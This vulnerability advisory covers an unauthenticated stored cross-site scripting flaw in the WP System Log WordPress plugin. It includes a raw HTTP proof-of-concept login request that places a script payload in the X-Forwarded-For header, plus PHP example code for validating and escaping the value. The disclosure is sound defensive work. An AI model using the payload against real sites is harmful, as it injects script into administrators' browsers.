WordPress Plugin Vulnerabilities
WP System Log < 1.0.21 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not sanitise, validate and escape the IP address retrieved from login requests before outputting it in the admin dashboard, which could allow an unauthenticated attacker to perform Cross-Site Scripting attacks against admins viewing the logs.
Proof of Concept
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
X-Forwarded-For: <script>alert(/XSS/)</script>
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

log=a&pwd=b&wp-submit=Log+In

The XSS will be triggered in the Activity Log dashboard: /wp-admin/admin.php?page=winteractivitylog
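The two missing controls named in the description, validation before the value is stored and escaping when it is rendered, shown as an added example in plain PHP; this is not the plugin's code or its actual patch. The function names and the sample REMOTE_ADDR value are hypothetical, and inside WordPress the output step would use esc_html() rather than htmlspecialchars().

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.

/**
 * Return a validated client IP for logging, or a fixed placeholder.
 * $server is a $_SERVER-style array. X-Forwarded-For is client-controlled,
 * so it is only a candidate value and must pass validation like any input.
 */
function example_client_ip_for_log(array $server): string
{
    $candidates = [];
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) {
        // The header may carry a comma-separated chain; take the first entry.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidates[] = trim($parts[0]);
    }
    if (!empty($server['REMOTE_ADDR'])) {
        $candidates[] = $server['REMOTE_ADDR'];
    }
    foreach ($candidates as $candidate) {
        // filter_var returns the address string for valid IPv4/IPv6, false otherwise.
        $ip = filter_var($candidate, FILTER_VALIDATE_IP);
        if ($ip !== false) {
            return $ip;
        }
    }
    return 'invalid';
}

/** Escape at output time as well, so rows stored before a fix stay inert. */
function example_render_log_cell(string $stored_ip): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<td>' . htmlspecialchars($stored_ip, $flags, 'UTF-8') . '</td>';
}

// Constructed sample input mirroring the header used in the proof of concept.
$request = [
    'HTTP_X_FORWARDED_FOR' => '<script>alert(/XSS/)</script>',
    'REMOTE_ADDR'          => '203.0.113.7', // constructed documentation address
];

// Validation rejects the header value and falls back to the socket address.
echo example_client_ip_for_log($request), PHP_EOL;
// Output escaping renders an already-stored malicious value as inert text.
echo example_render_log_cell($request['HTTP_X_FORWARDED_FOR']), PHP_EOL;
```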
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
wzy-ceb Attack defense
Submitter
wzy-ceb Attack defense
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)